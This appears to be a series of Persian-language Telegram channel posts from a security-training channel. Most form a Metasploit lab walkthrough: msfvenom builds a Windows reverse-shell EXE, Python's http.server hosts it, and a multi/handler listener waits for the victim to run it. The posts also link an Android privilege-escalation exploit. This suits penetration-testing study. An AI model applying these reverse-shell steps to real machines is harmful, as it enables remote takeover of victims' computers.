Try Hack Box

دوستان اگر مهارتی در برنامه نویسی هر زبانی و حوزه های امنیت دارید یا حتی یک دوره رو خوب بلد هستید و نسبتا متوسط و مایل هستید اون دانش برای دیگر دوستان آموزش بدید و برای خودتون مرور بشه میتونید در کانال ما شروع به تولید محتوا کنید . آیدی جهت ارتباط : @Thb_Support یا @Unique_exploitbot

دوستان اگر مهارتی در برنامه نویسی هر زبانی و حوزه های امنیت دارید یا حتی یک دوره رو خوب بلد هستید و نسبتا متوسط و مایل هستید اون دانش برای دیگر دوستان آموزش بدید و برای خودتون مرور بشه میتونید در کانال ما شروع به تولید محتوا کنید . آیدی جهت ارتباط : @Thb_Support یا @Unique_exploitbot

اکسپلویت برای CVE-2022-20452 افزایش دسترسی در اندروید از برنامه نصب شده به برنامه سیستم (یا برنامه دیگر) https://github.com/michalbednarski/LeakValue #exploit #android @pfksecurity

دستور show options برخی از گزینه‌های مهم مانند LHOST و LPORT را نشان می‌دهد (آدرس IP و شماره پورتی که پیلود تحویل داده شده به آن متصل می‌شود). LHOST را برای payload روی آدرس IP لینوکس خود تنظیم کنید تا وقتی پیلود روی تارگت ویندوز اجرا می شود، payload بتواند دوباره به دستگاه لینوکس شما متصل شود. (دوباره، توجه داشته باشید که اگر آدرس دیگری را در اینجا انتخاب کنیم، می‌توانیم LHOST را که در file.exe ساخته‌ایم لغو کنیم، زیرا پیلود multi/handler و پیکربندی آن بر پیلود فایل file.exe لغو می‌شود. اما ما از همان آدرس آدرس خود استفاده می‌کنیم. دستگاه لینوکس برای این آزمایشگاه.) LHOST را روی 0. 0 . 0 . 0 تنظیم می کنیم. بنابراین در تمام رابط ها گوش می دهد. در این مورد، فایل payload ما (file.exe) می داند که به کجا متصل شود، زیرا LHOST را با msfvenom ارائه کرده ایم. LHOST و LPORT را تنظیم کنید، سپس تنظیمات را با گزینه های نمایش تأیید کنید.

دستور show options برخی از گزینه‌های مهم مانند LHOST و LPORT را نشان می‌دهد (آدرس IP و شماره پورتی که پیلود تحویل داده شده به آن متصل می‌شود). LHOST را برای payload روی آدرس IP لینوکس خود تنظیم کنید تا وقتی پیلود روی تارگت ویندوز اجرا می شود، payload بتواند دوباره به دستگاه لینوکس شما متصل شود. (دوباره، توجه داشته باشید که اگر آدرس دیگری را در اینجا انتخاب کنیم، می‌توانیم LHOST را که در file.exe ساخته‌ایم لغو کنیم، زیرا پیلود multi/handler و پیکربندی آن بر پیلود فایل file.exe لغو می‌شود. اما ما از همان آدرس آدرس خود استفاده می‌کنیم. دستگاه لینوکس برای این آزمایشگاه.) LHOST را روی 0. 0 . 0 . 0 تنظیم می کنیم. بنابراین در تمام رابط ها گوش می دهد. در این مورد، فایل payload ما (file.exe) می داند که به کجا متصل شود، زیرا LHOST را با msfvenom ارائه کرده ایم. LHOST و LPORT را تنظیم کنید، سپس تنظیمات را با گزینه های نمایش تأیید کنید.

وقتی file.exe را ساختیم، به msfvenom گفتیم که یک فایل EXE مخرب با استفاده از همین پیلود (windows/shell/reveise_tcp) بسازد. جالب است بدانید که اگر فایل مخربی مانند file.exe را با پیلودی متفاوت از پیلودی که با استفاده از multi/handler در msfconsole ارسال می کنیم پیکربندی کنیم، پیلود ارسال شده توسط multi/handler اولویت دارد! فایل مخرب ایجاد شده توسط متاسپلویت (مانند file.exe) یک پیلود متفاوت از مولتی/هندلر دریافت می‌کند که با آن پیلود متفاوت ساخته شده است و اجرا می‌کند، و هر یک از قابلیت‌های payload خودش را نادیده می‌گیرد. با این حال، برای این آزمایشگاه، از همان payload در multi/handler استفاده خواهیم کرد که در file.exe با msfvenom استفاده کردیم. بیشتر پنتسترها از یک پیلود استفاده می کنند، بنابراین این همان کاری است که ما در اینجا انجام خواهیم داد. پس از انتخاب یک پیلود، به تمام گزینه‌هایی که می‌توانید با اجرای گزینه‌های نمایش پیکربندی کنید، نگاه کنید. #metasploit @TryHackBox

msf5 > use exploit/multi/handler درخواست شما کانتکست را برای گفتن msf5 exploit(multi/handler) تغییر می دهد > . این به شما می‌گوید که msfconsole زمینه ماژول خاص اکنون در حال اجرا است. اکنون می‌توانیم تمام پیلودهای پرداختی را که با اکسپلویت انتخابی ما سازگار هستند، با اجرا مشاهده کنیم: msf5 exploit(multi/handler) > show payloads اگر این لیست را بررسی کنید، خواهید دید که windows/shell/reverse_tcp یکی از payloadهایی است که با اکسپلویت multi/handler کار می کند. این همان چیزی است که از آن استفاده خواهیم کرد تا با پیلود فایل file.exe که قبلاً ایجاد کردیم مطابقت داشته باشد. از دستور set برای تنظیم گزینه PAYLOAD روی windows/shell/reverse_tcp استفاده کنید. msf5 exploit(multi/handler) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp

برای multi/handler، به توضیحات توجه کنید: "این ماژول یک stub است که تمام فیچر های متاسپلویت پیلود سیستم را برای اکسپلویت هایی که خارج از چارچوب راه اندازی شده اند، ارائه می دهد". پس از پیکربندی multi/handler، ما از یک کاربر خواهیم داشت که فایل مخرب ما را با استفاده از یک مرورگر دانلود کرده و آن را به صورت دستی اجرا می کند (بنابراین آن را خارج از چارچوب راه اندازی می کند). برنامه file.exe دوباره به multi/handler متصل می شود، جایی که ما آن را کنترل می کنیم. ما می توانیم از multi/handler برای منتظر ماندن برای اتصال از file.exe استفاده کنیم. از دستور use برای انتخاب multi/handler استفاده کنید.

متاسپلویت دارای بیش از 2000 اکسپلویت مختلف برای انواع نقص های نرم افزاری مختلف است. ما از expioit/muiti/handier استفاده می کنیم که به اختصار multi/handler نیز شناخته می شود. دستور info در msfconsole می‌تواند در هر زمان برای کسب اطلاعات بیشتر در مورد هزاران ماژول در متاسپلویت، از جمله اکسپلویت‌ها، پیلودها، ماژول‌های کمکی و غیره استفاده شود. خروجی خلاصه‌ای مفید از استفاده از ماژول، متغیرهای آن، و گزینه های دیگر برای پیکربندی آن از دستور info برای دریافت اطلاعات بیشتر در مورد multi/handler استفاده کنید.

مرحله 3: msfconsole را پیکربندی کنید یک پنجره ترمینال دیگر را باز کنید! در این پنجره ترمینال دوم (جدا از شما دستور http.server)، برنامه msfconsole را فراخوانی کنید. msfconsole در اعلان msf، دستورات را به صورت تعاملی به متاسپلویت صادر کنید. به آن بگویید تمام ماژول های اکسپلویت را که در دسترس است نشان دهد. #Metasploit @TryHackBox

مرحله 2: فایل را از لینوکس Serve کنید یک وب سرور لینوکس را پیکربندی کنید تا محتویات دایرکتوری /tmp شما (شامل fiie.exe) را ارائه دهد. حالا cdرا وارد دایرکتوری کنید که می خواهید محتوای آن از طریق HTTP ارائه شود. سپس مفسر پایتون را اجرا کنید تا ماژولی به نام http,server , listening on TCP 8000 port 8000 (پیش‌فرض) فراخوانی شود: $ cd /tmp/ /tmp$ python -m http.server با اجرای http.server در یک پنجره، اکنون به مرحله 3 می رویم و msfconsole Metasploit را فراخوانی و پیکربندی می کنیم. #Metasploit @TryHackBox

#Узнатьобиспользовании |~DarkWeb |~LeranExploit |~DarkWorld

اندازه offile.exe را بررسی کنید. باید بسیار نزدیک به 73802 بایت باشد (اگرچه ممکن است یک یا دو بایت بزرگتر باشد): Is -1 /tmp/file.exe اگر /tmp/file.exe 73802 بایت نیست (احتمالاً به اضافه یک یا دو بایت)، آن را حذف کنید (با rm /tmp/file.exe)، سینتکس خود را از نظر msfvenom دوباره بررسی کنید، و دوباره ایجاد کنید. #Metasploit @TryHackBox

LHOST = =YOUR_LINUX_eth0_IP_ADDRESS

چالش: از msfvenom برای تبدیل windows/sheii/reverse tcp payload به یک فایل اجرایی مستقل استفاده کنید. شما باید LPORT و LHOST را تنظیم کنید.

حالا msfvenom را اجرا کنید تا windows/shell/reverse_tcp به یک فایل مستقل تبدیل شود. وقتی اجرا شد، می‌خواهید این پیلود به دستگاه لینوکس شما متصل شود، بنابراین باید LHOST (که محلی میزبان است) را به آدرس IP لینوکس خود پیکربندی کنید تا دوباره به شما متصل شود. پورت محلی را برای اتصال به عقب (LPORT) روی 9999 تنظیم کنید. در نهایت، یک -f exe را در انتهای لیست موارد برای msfvenom قرار دهید. این به آن می‌گوید که یک فایل با فرمت EXE ویندوز ایجاد کند. ابزار msfvenom به سادگی فایل مخرب را در خروجی استاندارد نمایش می دهد، بنابراین فایل مخرب حاصل را به سیستم فایل خود در /tmp/file.exe هدایت کنید.

اکنون با استفاده از —list format نگاهی به فرمت های خروجی بیندازید.

مرحله 1: ساخت فایل مخرب msfvenom را با گزینه -help اجرا کنید تا بتوانید خلاصه مختصری از نحو آن را دریافت کنید. برای استفاده از ابزار، باید پیلود مورد نظر خود را با فلگ -p مشخص کنید، لیستی از متغیرها برای آن payload (شامل شماره پورت به وصل شوید)، و فرمت پیلودی که می خواهید (از جمله EXE، که با -f exe مشخص می کنید): به نتایج msfvenom -help نگاه کنید. #Metasploit @TryHackBox